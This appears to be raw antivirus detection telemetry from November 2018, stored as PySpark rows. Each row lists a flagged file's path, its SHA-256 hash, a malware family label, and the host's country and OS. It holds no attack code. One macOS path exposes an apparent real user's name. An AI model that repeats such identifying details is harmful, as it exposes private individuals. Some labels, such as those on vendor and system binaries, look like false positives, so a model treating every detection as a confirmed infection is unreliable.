  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T13:48:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-162139-649e161d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7bce52ab\\AVSCAN-20181104-161912-52AA11DC\\AVSCAN-20181104-162139-649E161D', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='9c7e8d7c836cde47e241518fdae083b02f328646b82766449797c2645a7750e2', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:21:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000243da', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp000243da', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:49:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered lecor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lecor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='20f94b9918d2d4b8ba837df710b9f8b32efc249a3f913cf61e67c410e41599f4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:53:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131155-1a51789f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131155-1A51789F', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:11:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='createlnk.dll', filepath='C:\\Program Files (x86)\\Hewlett-Packard\\OrderReminder\\CreateLnk.dll', filesize=152000, name='W32/Ramnit.C.#M1.#R1'), hash='65ff6bf74e41d58d9d2fb4e8707bdbcaf30faef555369bb3f6b27fa7ef064ceb', metadata=Row(cmdline=None, country='AO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=673040, timestamp='2018-11-04T16:57:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-093252-17fc0099', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d62c89d\\AVSCAN-20181104-093114-09C9E987\\AVSCAN-20181104-093252-17FC0099', filesize=4992000, name='DR/Delphi.Gen.#M1.#R1'), hash='6effd6351227497ea1e1d697792f0b7050faf5fc051144d52122171fc9a84a0e', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:32:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130454-fa759cd4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-130454-FA759CD4', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:04:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe502_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe502 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T09:00:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Documents\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T23:38:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2624906\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T01:36:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-230216-1cb67d14', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-230216-1CB67D14', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T22:02:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000243d8', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp000243d8', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:48:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='main.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\go-build427770946\\b001\\exe\\main.exe', filesize=13184000, name='HEUR/APC.#M1.#R1'), hash='30c0783c80e8e28ed520667a8042d69a7e947005e81afee0d1919b37935d867e', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Go\\bin\\go.exe', parentsize=11187712, timestamp='2018-11-04T08:51:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='lostfile_exe_46992418.exe', filepath='\\\\?\\C:\\Users\\X\\Dropbox\\Formateo de PC\\Escuelas\\Escuela Nueva TP\\Imagen bak up\\E\\Lost Files\\LostFile_EXE_46992418.exe', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='2db7a1f8ea77965207cd9f9f05df8e2925ae0f77b07dca24ee8fd4d8a8e6f422', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:57:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\WinSxS\\x86_microsoft-windows-d..b-standardcollector_31bf3856ad364e35_10.0.16299.15_none_f80fc00b2c3cec50\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='0375a8abdd68739293e8746e0bcc449686ed62bb2b114ce363695c4b09e83bfc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T20:32:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-200021-32b1c70f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-200021-32B1C70F', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:00:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='divx1.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\IXP000.TMP\\divx1.exe', filesize=5000000, name='TR/Dropper.Gen.#M300.#R3322'), hash='759d928ec2c257498152d681e52dd8ae10ffbac7cd6127acc2e88a753ce95aab', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa4636.36813\\DivX Plus Pro v10.4\\Installer\\DivXSetup-pro.exe', parentsize=619008, timestamp='2018-11-04T20:12:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmpuuq3zcr9', filepath='/tmp/tmpuuq3zcr9', filesize=448000, name='TR/Crypt.ZPACK.Gen8.#M2.#R700208'), hash='448acf244dba595c2df19c04c0e918e6cdb5296365c62b873885f788f753d223', metadata=Row(cmdline=None, country='IE', os_name='Linux', os_vmajor='8', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T15:45:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-220447-139fef6b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-220447-139FEF6B', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:04:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='7ef39666ee49f1286a81e494612b3c70d99aae4e', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\7ef39666ee49f1286a81e494612b3c70d99aae4e', filesize=320000, name='ADWARE/DealPly.Gen.#M1.#R1'), hash='779117bbe246c21ec07017d2d508b1dc45ad036956787ec04e6d1da9a47515ec', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:20:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='corie.dll', filepath='C:\\Program Files (x86)\\kathryn\\corie.dll', filesize=384000, name='HEUR/AGEN.1029348.#M1.#R1'), hash='792eb813b02b20f688359d09078d12888a37e812ac8b2d7410e54dadf7ca8a02', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3894968, timestamp='2018-11-04T09:54:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-192850-75b6a0f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bc727c94\\AVSCAN-20181104-190515-975C53E3\\AVSCAN-20181104-192850-75B6A0F7', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:28:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T11:26:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-120703-1c3a04c2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6ad6bb1d\\AVSCAN-20181104-120556-157A3FEF\\AVSCAN-20181104-120703-1C3A04C2', filesize=64000, name='Adware/Agent.cpdes.#M1.#R1'), hash='1e1dbfbbd2200ab8bd10445b01ef228d054a09dbf8b6036d921420e625055c22', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:07:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-183618-ee0f3101', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78722127\\AVSCAN-20181104-183509-E476EDC3\\AVSCAN-20181104-183618-EE0F3101', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:36:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0008e6b7', filepath='C:\\Windows\\Temp\\tmp00000336\\tmp0008e6b7', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T11:06:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dccw.exe', filepath='E:\\Windows\\System32\\dccw.exe', filesize=896000, name='TR/Patched.Ren.Gen.#M300.#R2947'), hash='1148c9091e120f00e686b6e47097c37786b865d5ed4ea6c7bdcd82f036f1869e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T06:02:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fashion.exe', filepath='F:\\digetal\\jawalari\\jwalri\\fashion\\fashion.exe', filesize=256000, name='W32/Drowor.#M0.#R0'), hash='b39c6fb8d2ae3356d52a251683c8efe4868bf6f882ca28d6153d60177c769842', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T08:24:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T20:07:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='arles papa juin 2014 .exe', filepath='C:\\Users\\X\\Documents\\Arles papa_031118\\Arles Papa Juin 2014\\Arles Papa Juin 2014 .exe', filesize=512000, name='TR/Patched.Ren.Gen.#M300.#R2969'), hash='036452ed8e9dd37d84f2d04db5df92a1ddce21ed9c1a21eefa84709bebbd5bc5', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T17:08:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-222358-e2f89a90', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-222358-E2F89A90', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:24:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000056c5', filepath='C:\\Windows\\Temp\\tmp000002c7\\tmp000056c5', filesize=12800000, name='TR/Patched.Ren.Gen.#M300.#R3134'), hash='3deb85f389a368ff0f924ce8b95028811ab3c9c94c97e06f35290dffb1a7461b', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\BDServices\\BitDefenderCOM.exe', parentsize=1028096, timestamp='2018-11-04T00:09:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T19:29:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-194805-48914564', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e4789539\\AVSCAN-20181104-194328-203F8B01\\AVSCAN-20181104-194805-48914564', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T21:48:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T23:15:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a41f0021e269dc55a28db460807bc14334adb3ee00d942832c42b630ed4db51f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\A41F0021E269DC55A28DB460807BC14334ADB3EE00D942832C42B630ED4DB51F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a41f0021e269dc55a28db460807bc14334adb3ee00d942832c42b630ed4db51f', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T09:53:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ilttrptc.exe', filepath='\\\\?\\C:\\WINDOWS\\SysWOW64\\lvljrgea\\ilttrptc.exe', filesize=15232000, name='TR/Crypt.XPACK.iypne.#M1.#R1'), hash='40234587da856a9a760f4ff824c17eb1da20ee23d69200da8a3b489a39d0ae72', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T06:05:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='clickjogos - governor of poker.exe', filepath='C:\\Users\\X\\Downloads\\ClickJogos - Governor Of Poker.exe', filesize=2288000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='70629a7a377c09b011d874d933e4b474ab32ef8e7edb1d5e7a1ddd4c9dc92ec7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T17:26:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_163e84e4.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_163e84e4.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00000175', filepath='C:\\Windows\\Temp\\tmp00000258\\tmp00000175', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T13:58:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='0.exe', filepath='G:\\العـــاب1\\Magic Tale\\0.exe', filesize=1024000, name='W32/Virut.Gen.#M1.#R1'), hash='b86db3a35b0e0479984cd00d6e2496b50ca0441bcf3b7f84b0f71c47b24eb343', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-04T14:34:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ebc9ee5453cd0ad0497310354aae89ced475f2bc', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\ebc9ee5453cd0ad0497310354aae89ced475f2bc', filesize=2944000, name='HEUR/AGEN.1020138.#M1.#R1'), hash='e6a6aed8447438b8778fe053855d7eab75c3f9afa2cd1b8b2f3bde7d2a44236f', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:49:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mstrxu.exe', filepath='\\\\?\\C:\\ProgramData\\mstrxu.exe', filesize=81104000, name='TR/Dropper.Gen.#M300.#R3204'), hash='b10b118a4fd177f890edd54813d70c547e0b9ddcca445f3747a571881b16cd8f', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:53:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered rinit', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered rinit', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='b291d04a513b0ba38ef40083d66fc8ef5ca7e686c9d27100ec812d5f5223cb24', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T01:06:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vcon.exe', filepath='\\?\\E:\\العا ب\\العاب جاتا\\GTA 2\\FORMULA 1\\RREDLINE\\VCON.EXE', filesize=128000, name='HEUR/APC.#M1.#R1'), hash='df6e3fd8032aa0cf3e2a91bb259f0d04ce9957cd499650c78e823054d8487b25', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T23:01:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[1].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[1].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:02:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='meatholes.com_12.05.11.val.xxx.imageset-yapg.rar', filepath='G:\\MeatHoles.com_12.05.11.Val.XXX.iMAGESET-YAPG-12\\.tmp\\MeatHoles.com_12.05.11.Val.XXX.iMAGESET-YAPG.rar', filesize=6528000, name='TR/Spy.Zbot.aim.#M1.#R1'), hash='bcfc810f08017b545195c20c4cd7b999113485fd282d4c7a2486972d2e8e1e7a', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Newshosting\\newshosting.exe', parentsize=349696, timestamp='2018-11-02T00:02:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='bed5637ba573b79fb13c77cf89b937f3e05cf99c1287e241dea544661e377870', metadata=Row(cmdline='\\\\\\/NOUACCHECK', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T12:52:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mypublicwifi.exe', filepath='D:\\hakimdede-vpn\\MyPublicWiFi.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='c6f4691a6533a22b437a3cee2624ff9e6428d9d838579da786a573f7db17184b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-02T11:26:31Z'), dt=datetime.date(2018, 11, 2)),
